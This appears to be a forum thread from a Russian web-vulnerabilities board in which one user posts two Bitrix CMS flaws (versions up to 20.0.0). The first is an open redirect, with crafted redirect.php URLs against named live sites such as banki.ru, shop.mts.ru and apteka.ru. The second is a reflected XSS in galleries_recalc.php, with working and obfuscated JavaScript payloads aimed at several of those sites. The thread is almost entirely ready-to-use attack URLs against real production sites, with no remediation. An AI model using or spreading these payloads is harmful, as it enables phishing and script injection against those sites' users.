Bitrix (1C-Битрикс)

Discussion in 'Веб-уязвимости' started by crlf, 30 Apr 2020.

  1. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    572
    Likes Received:
    1,100
    Reputations:
    374
    Open Redirect <= 20.0.0

    Code:
    https://www.bitrix24.com/bitrix/redirect.php?goto=http://www.bitrix24.com%252F@antichat.com/
    https://shop.mts.ru/bitrix/redirect.php?goto=http://shop.mts.ru%252F@antichat.com/
    https://www.banki.ru/bitrix/redirect.php?goto=https://www.banki.ru%252F@antichat.com/
    https://www.securitylab.ru/bitrix/redirect.php?goto=http://www.securitylab.ru%252F@antichat.com/
    https://apteka.ru/bitrix/redirect.php?goto=http://apteka.ru%252F@antichat.com/
    https://www.radiorecord.ru/bitrix/redirect.php?goto=http://www.radiorecord.ru%252F@antichat.com/
    https://www.maxidom.ru/bitrix/redirect.php?goto=http://www.maxidom.ru%252F@antichat.com/
    https://fix-price.ru/bitrix/redirect.php?goto=http://fix-price.ru%252F@antichat.com/
    https://www.toy.ru/bitrix/redirect.php?goto=http://www.toy.ru%252F@antichat.com/
    
    и т.д. :)
     
    #1 crlf, 30 Apr 2020
    Last edited: 30 Apr 2020
  2. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    572
    Likes Received:
    1,100
    Reputations:
    374
    Reflected XSS <= 20.0.0

    Code:
    https://www.toy.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(document.domain);if(1){//
    https://www.banki.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};top[%27a%27%2B%27lert%27](document.domain);if(1){//
    https://shop.mts.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};top[%27a%27%2B%27lert%27](document.domain);if(1){//
    
     
Loading...